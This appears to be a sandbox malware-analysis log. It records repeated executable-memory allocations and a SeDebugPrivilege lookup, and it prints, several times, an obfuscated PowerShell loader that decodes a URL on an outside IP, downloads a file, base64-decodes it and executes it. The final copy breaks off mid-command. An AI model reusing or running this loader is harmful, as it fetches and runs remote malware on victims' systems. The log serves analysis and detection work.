protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0260a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2196
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73972000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02602000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02612000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0267a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02613000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02614000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0268b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02687000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0260b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02672000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02685000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02615000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0267c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02880000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02616000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0268c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02673000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02674000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02675000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02676000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02677000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02678000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02679000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a81000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a82000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a83000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a84000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a85000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a86000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a87000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a88000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a89000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a90000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a91000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a92000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a93000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a94000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Sprg9 ([String]$Sydyemene4){$Sidingsku=$Sydyemene4.toCharArray();For($Propolis46=5; $Propolis46 -lt $Sidingsku.count-1; $Propolis46+=(5+1)){$rufulousna+=$Sidingsku[$Propolis46]};$rufulousna;}$Volu=Sprg9 ' WankhCeliotSchelt malep Fagu:Opspa/Obtai/ Skol9March1Sacra.gertr2Woolm4 Redu4 Snig. Alec1Misal9 Drin7concu. Impe9 Llin/LabounOmkoseSpracwnyhed/TndstUunpronIsidosMellelSkatt. DumpjdiplaaSternvSophraFempe ';$rufulousna01=Sprg9 ' TilsiSpksteBarbexBesom ';$Telo = Sprg9 'Wagne\Iconos poiny Kabes CambwBrassoCarbowfulfi6Super4Judic\AfmnsW Aflaistregnhypomd OveroPhospw UtopsKrapfP Ansto AlpiwFestfe BoggrAsphyS antih CaraePensil AntalHekse\Emeliv Erhv1 Baue.Taskm0Modif\BraunpUdtnkoHumanwUddykeCharer QuilsafstihMelipeAfhorlRomtol Besy. PreaeHusarx Socie Solv ';.($rufulousna01) (Sprg9 ' Hejs$BuldeTRevera AviliEtatslFlyvso Bals2 Hype= Foru$ Quilekompln Trisv Subr:Diariw FuseiAmanin BanadAurorifraterBlodf ') ;.($rufulousna01) (Sprg9 'Uddat$ FlawT Conte ArchlCarisoMarkr= Duef$GraniT OrddatommeiAeroplRansaoMckee2 Beas+Escap$ RhopT KonseFertil PuntoExoto ') ;.($rufulousna01) (Sprg9 'Deter$RibbeS AlnivNondea SeafrDixiesBismek GenbrSucce semio= shov unde( Rmet(Blitzg SkinwOversmshinwiFordr kvadw KystiContun Klen3 Deku2 Brne_ OverpUnresr Vegeo ThrecSemiheAntimsMothwsJoggi Trygh-NgaioF Unga DawnPAltarr GenfoUnhelcSenateKotowsAntiasvillaIViscidRejse=Udbls$ Tilh{UndefP MistIStemmD Noxi} Morp)Prveu.VelkeCRewaroDivismLineam Aguaa Duodn progd PsitL SammiTheomnMidfre Drag)Esdra part-Pastis JulepSirell Tilsi PejltFrost Norma[Craftc Skolh Hecta Anaer Tiko] Udto3 Ooph4 Udga ');.($rufulousna01) (Sprg9 ' Fugl$ CampaSkyttfmolinsaarhukFromeeDekladSnildsGrfab Trip= Ring Rispe$JegerS SunbvPlumeaMomskr RegisUnconkBenstr Over[ Data$efterSVesicv RetsaAksiorCreossKonomk SinorSaffa.Ughs c bosso TousuChairnTypehtForda-Airdr2Chlor]Orang ');.($rufulousna01) (Sprg9 'Skrid$PhospWStenba Landd dauniNatioo PostpLeucomWindbu 
UnbanForeltDsigh= Kern(bydefTOnaneekondosFlourtOffse- OverPUnlina PanetElforh tran Subge$ AngiT Vaske LunglIndsko Belb)Espie Disco-VrktjAPreben Eased Phil Tandh(Dobbe[ AntiIUnclenTittutBndelP MisltBriber Bern]Bediz:Bight:BistasOpruliSubinz Bambe ampe Emne-BiogreMors qSylla Probl8Posta) Rumi ') ;if ($Wadiopmunt) {.$Telo $afskeds;} else {;$rufulousna00=Sprg9 ' MarkS ElevtSuggea ElekrConset Dels-TuggeB Mesoi StratBiogrs DesiTConchr IdeaaDysgenAngoss FeltfAnmele Outbr Hipp Jule-SekslSSinoloFremsu Strir Counc SimoeUncin pret$RepulV caskoCorral HexauUrger Haplo-TubfiDLimemeBrydesLocaltDesiniSansen HenfaCampit Anali StveoPachyn Shar Subco$ SlatTCrossaKorali SikklParagoTelev2 Spec ';.($rufulousna01) (Sprg9 'Bortf$FanliT NanoaGyse i VinnlKaryoo Home2Tuber=Skjol$HaunteRattlnLatesvSkval:outtha PlanpEpeirp MeladHandla SolotTaktlaUnpre ') ;.($rufulousna01) (Sprg9 ' VersIMerchmScrippSamfro Histr EjentDamec-BlaamMZonuloPannadBestyu StrilHalefe Bass IndsiBOeer i GlostBinapsDactyT KendrAfganarangsnUndersPhaeofMestreIsolerPrein ') ;$Tailo2=$Tailo2+'\Geadepha.Tri';while (-not $gvinkele) {.($rufulousna01) (Sprg9 'Minim$Demong Finav Intei SeminInappk HandeTintnl PriseOpsli= Dekl( HirpT Rumse Gotrs HalvtComme- VandP BekvaHarputTeca hFrowa Char$ DiphTAmuttaRygkliMrkedlSawbao cock2 Diso)Troll ') ;.($rufulousna01) $rufulousna00;.($rufulousna01) (Sprg9 ' itseSBivuatSholeaSignarSkilltBassi-SeamaS AnchlSortee IngeeSphenpaouad Hjemm5Risen ');}.($rufulousna01) (Sprg9 ' Affe$ StrmS ObjepFejemr PilogDrive stets=svejs calcGHandwe kongtClach- BengCHjlndo FejlnRetrotDebuteVandbn StictBagta Genne$ChalyTTonesa UskniInfoll ObtuoHstpa2Spado ');.($rufulousna01) (Sprg9 'Laant$InhalK AtheoKujonnCampskSutoru OpfibPrema Aksel=Alkal centr[ KompS Muriy Spers Marst Berbe Gorkm Flas.OveraCAmmesoMyocon Assyv Lepte Rmmer Ddmat Impu]Sasch:Under: SydaFTidssrHumidoOpvismKerneBLysrea EnewsSlagpeSamse6 Sent4FourtSTillrt Resir Anchi Terrn Glung Elev(Alleg$ArchhSRewasp EurorKyu SgHusma)Curar ');.($rufulousna01) (Sprg9 
'Pighe$ FraprSkrivuGotchfEnebouBaccalinvoko UdfluFlancs HjlpnCoasta Kake2 Dump Inka=Veste ges [FortjSbruniy langs Tyktt biolePyrommArbor.CarriTArbeje Antox ClautCalvi.talloE Bentn BalecOpkoboGlasudMeloti UdvenHomozgsympa]Subsu: Eksp:VaderACoquiS KundCAlluvI SecrIBoxer.BladhGHetere Recot AchiS Halvt quinr Patti JegsnFalmegBleph( repr$SeiyuKInquaoRedpon Fritk Skudu DensbUsand)Sextu ');.($rufulousna01) (Sprg9 'Impas$ TronP UngteKvindrGennecDuran1Curia2Conce1 Apes=Tagre$frostr Blafu GgehfLegaru armbl lednopapilu SanisFornunKrebia Enke2 Humm.DeipasLowliuPyraubStadssYakutt Knarr TabeiDibranDdssyg Kali(Sortk2Catas0Norte2 Kiru2 Ford4 Velb7rille, sigt2 Snke5 Cass0 folk5Letva2Compl) Gaar ');.($rufulousna01) $Perc121;}"
wmi select * from win32_process where ProcessId=2196
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: POWERSHELL
parameters: "Function Sprg9 ([String]$Sydyemene4){$Sidingsku=$Sydyemene4.toCharArray();For($Propolis46=5; $Propolis46 -lt $Sidingsku.count-1; $Propolis46+=(5+1)){$rufulousna+=$Sidingsku[$Propolis46]};$rufulousna;}$Volu=Sprg9 ' WankhCeliotSchelt malep Fagu:Opspa/Obtai/ Skol9March1Sacra.gertr2Woolm4 Redu4 Snig. Alec1Misal9 Drin7concu. Impe9 Llin/LabounOmkoseSpracwnyhed/TndstUunpronIsidosMellelSkatt. DumpjdiplaaSternvSophraFempe ';$rufulousna01=Sprg9 ' TilsiSpksteBarbexBesom ';$Telo = Sprg9 'Wagne\Iconos poiny Kabes CambwBrassoCarbowfulfi6Super4Judic\AfmnsW Aflaistregnhypomd OveroPhospw UtopsKrapfP Ansto AlpiwFestfe BoggrAsphyS antih CaraePensil AntalHekse\Emeliv Erhv1 Baue.Taskm0Modif\BraunpUdtnkoHumanwUddykeCharer QuilsafstihMelipeAfhorlRomtol Besy. PreaeHusarx Socie Solv ';.($rufulousna01) (Sprg9 ' Hejs$BuldeTRevera AviliEtatslFlyvso Bals2 Hype= Foru$ Quilekompln Trisv Subr:Diariw FuseiAmanin BanadAurorifraterBlodf ') ;.($rufulousna01) (Sprg9 'Uddat$ FlawT Conte ArchlCarisoMarkr= Duef$GraniT OrddatommeiAeroplRansaoMckee2 Beas+Escap$ RhopT KonseFertil PuntoExoto ') ;.($rufulousna01) (Sprg9 'Deter$RibbeS AlnivNondea SeafrDixiesBismek GenbrSucce semio= shov unde( Rmet(Blitzg SkinwOversmshinwiFordr kvadw KystiContun Klen3 Deku2 Brne_ OverpUnresr Vegeo ThrecSemiheAntimsMothwsJoggi Trygh-NgaioF Unga DawnPAltarr GenfoUnhelcSenateKotowsAntiasvillaIViscidRejse=Udbls$ Tilh{UndefP MistIStemmD Noxi} Morp)Prveu.VelkeCRewaroDivismLineam Aguaa Duodn progd PsitL SammiTheomnMidfre Drag)Esdra part-Pastis JulepSirell Tilsi PejltFrost Norma[Craftc Skolh Hecta Anaer Tiko] Udto3 Ooph4 Udga ');.($rufulousna01) (Sprg9 ' Fugl$ CampaSkyttfmolinsaarhukFromeeDekladSnildsGrfab Trip= Ring Rispe$JegerS SunbvPlumeaMomskr RegisUnconkBenstr Over[ Data$efterSVesicv RetsaAksiorCreossKonomk SinorSaffa.Ughs c bosso TousuChairnTypehtForda-Airdr2Chlor]Orang ');.($rufulousna01) (Sprg9 'Skrid$PhospWStenba Landd dauniNatioo PostpLeucomWindbu UnbanForeltDsigh= Kern(bydefTOnaneekondosFlourtOffse- OverPUnlina 
PanetElforh tran Subge$ AngiT Vaske LunglIndsko Belb)Espie Disco-VrktjAPreben Eased Phil Tandh(Dobbe[ AntiIUnclenTittutBndelP MisltBriber Bern]Bediz:Bight:BistasOpruliSubinz Bambe ampe Emne-BiogreMors qSylla Probl8Posta) Rumi ') ;if ($Wadiopmunt) {.$Telo $afskeds;} else {;$rufulousna00=Sprg9 ' MarkS ElevtSuggea ElekrConset Dels-TuggeB Mesoi StratBiogrs DesiTConchr IdeaaDysgenAngoss FeltfAnmele Outbr Hipp Jule-SekslSSinoloFremsu Strir Counc SimoeUncin pret$RepulV caskoCorral HexauUrger Haplo-TubfiDLimemeBrydesLocaltDesiniSansen HenfaCampit Anali StveoPachyn Shar Subco$ SlatTCrossaKorali SikklParagoTelev2 Spec ';.($rufulousna01) (Sprg9 'Bortf$FanliT NanoaGyse i VinnlKaryoo Home2Tuber=Skjol$HaunteRattlnLatesvSkval:outtha PlanpEpeirp MeladHandla SolotTaktlaUnpre ') ;.($rufulousna01) (Sprg9 ' VersIMerchmScrippSamfro Histr EjentDamec-BlaamMZonuloPannadBestyu StrilHalefe Bass IndsiBOeer i GlostBinapsDactyT KendrAfganarangsnUndersPhaeofMestreIsolerPrein ') ;$Tailo2=$Tailo2+'\Geadepha.Tri';while (-not $gvinkele) {.($rufulousna01) (Sprg9 'Minim$Demong Finav Intei SeminInappk HandeTintnl PriseOpsli= Dekl( HirpT Rumse Gotrs HalvtComme- VandP BekvaHarputTeca hFrowa Char$ DiphTAmuttaRygkliMrkedlSawbao cock2 Diso)Troll ') ;.($rufulousna01) $rufulousna00;.($rufulousna01) (Sprg9 ' itseSBivuatSholeaSignarSkilltBassi-SeamaS AnchlSortee IngeeSphenpaouad Hjemm5Risen ');}.($rufulousna01) (Sprg9 ' Affe$ StrmS ObjepFejemr PilogDrive stets=svejs calcGHandwe kongtClach- BengCHjlndo FejlnRetrotDebuteVandbn StictBagta Genne$ChalyTTonesa UskniInfoll ObtuoHstpa2Spado ');.($rufulousna01) (Sprg9 'Laant$InhalK AtheoKujonnCampskSutoru OpfibPrema Aksel=Alkal centr[ KompS Muriy Spers Marst Berbe Gorkm Flas.OveraCAmmesoMyocon Assyv Lepte Rmmer Ddmat Impu]Sasch:Under: SydaFTidssrHumidoOpvismKerneBLysrea EnewsSlagpeSamse6 Sent4FourtSTillrt Resir Anchi Terrn Glung Elev(Alleg$ArchhSRewasp EurorKyu SgHusma)Curar ');.($rufulousna01) (Sprg9 'Pighe$ FraprSkrivuGotchfEnebouBaccalinvoko UdfluFlancs HjlpnCoasta 
Kake2 Dump Inka=Veste ges [FortjSbruniy langs Tyktt biolePyrommArbor.CarriTArbeje Antox ClautCalvi.talloE Bentn BalecOpkoboGlasudMeloti UdvenHomozgsympa]Subsu: Eksp:VaderACoquiS KundCAlluvI SecrIBoxer.BladhGHetere Recot AchiS Halvt quinr Patti JegsnFalmegBleph( repr$SeiyuKInquaoRedpon Fritk Skudu DensbUsand)Sextu ');.($rufulousna01) (Sprg9 'Impas$ TronP UngteKvindrGennecDuran1Curia2Conce1 Apes=Tagre$frostr Blafu GgehfLegaru armbl lednopapilu SanisFornunKrebia Enke2 Humm.DeipasLowliuPyraubStadssYakutt Knarr TabeiDibranDdssyg Kali(Sortk2Catas0Norte2 Kiru2 Ford4 Velb7rille, sigt2 Snke5 Cass0 folk5Letva2Compl) Gaar ');.($rufulousna01) $Perc121;}"
filepath: POWERSHELL
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Sprg9 ([String]$Sydyemene4){$Sidingsku=$Sydyemene4.toCharArray();For($Propolis46=5; $Propolis46 -lt $Sidingsku.count-1; $Propolis46+=(5+1)){$rufulousna+=$Sidingsku[$Propolis46]};$rufulousna;}$Volu=Sprg9 ' WankhCeliotSchelt malep Fagu:Opspa/Obtai/ Skol9March1Sacra.gertr2Woolm4 Redu4 Snig. Alec1Misal9 Drin7concu. Impe9 Llin/LabounOmkoseSpracwnyhed/TndstUunpronIsidosMellelSkatt. DumpjdiplaaSternvSophraFempe ';$rufulousna01=Sprg9 ' TilsiSpksteBarbexBesom ';$Telo = Sprg9 'Wagne\Iconos poiny Kabes CambwBrassoCarbowfulfi6Super4Judic\AfmnsW Aflaistregnhypomd OveroPhospw UtopsKrapfP Ansto AlpiwFestfe BoggrAsphyS antih CaraePensil AntalHekse\Emeliv Erhv1 Baue.Taskm0Modif\BraunpUdtnkoHumanwUddykeCharer QuilsafstihMelipeAfhorlRomtol Besy. PreaeHusarx Socie Solv ';.($rufulousna01) (Sprg9 ' Hejs$BuldeTRevera AviliEtatslFlyvso Bals2 Hype= Foru$ Quilekompln Trisv Subr:Diariw FuseiAmanin BanadAurorifraterBlodf ') ;.($rufulousna01) (Sprg9 'Uddat$ FlawT Conte ArchlCarisoMarkr= Duef$GraniT OrddatommeiAeroplRansaoMckee2 Beas+Escap$ RhopT KonseFertil PuntoExoto ') ;.($rufulousna01) (Sprg9 'Deter$RibbeS AlnivNondea SeafrDixiesBismek GenbrSucce semio= shov unde( Rmet(Blitzg SkinwOversmshinwiFordr kvadw KystiContun Klen3 Deku2 Brne_ OverpUnresr Vegeo ThrecSemiheAntimsMothwsJoggi Trygh-NgaioF Unga DawnPAltarr GenfoUnhelcSenateKotowsAntiasvillaIViscidRejse=Udbls$ Tilh{UndefP MistIStemmD Noxi} Morp)Prveu.VelkeCRewaroDivismLineam Aguaa Duodn progd PsitL SammiTheomnMidfre Drag)Esdra part-Pastis JulepSirell Tilsi PejltFrost Norma[Craftc Skolh Hecta Anaer Tiko] Udto3 Ooph4 Udga ');.($rufulousna01) (Sprg9 ' Fugl$ CampaSkyttfmolinsaarhukFromeeDekladSnildsGrfab Trip= Ring Rispe$JegerS SunbvPlumeaMomskr RegisUnconkBenstr Over[ Data$efterSVesicv RetsaAksiorCreossKonomk SinorSaffa.Ughs c bosso TousuChairnTypehtForda-Airdr2Chlor]Orang ');.($rufulousna01) (Sprg9 'Skrid$PhospWStenba Landd dauniNatioo PostpLeucomWindbu 
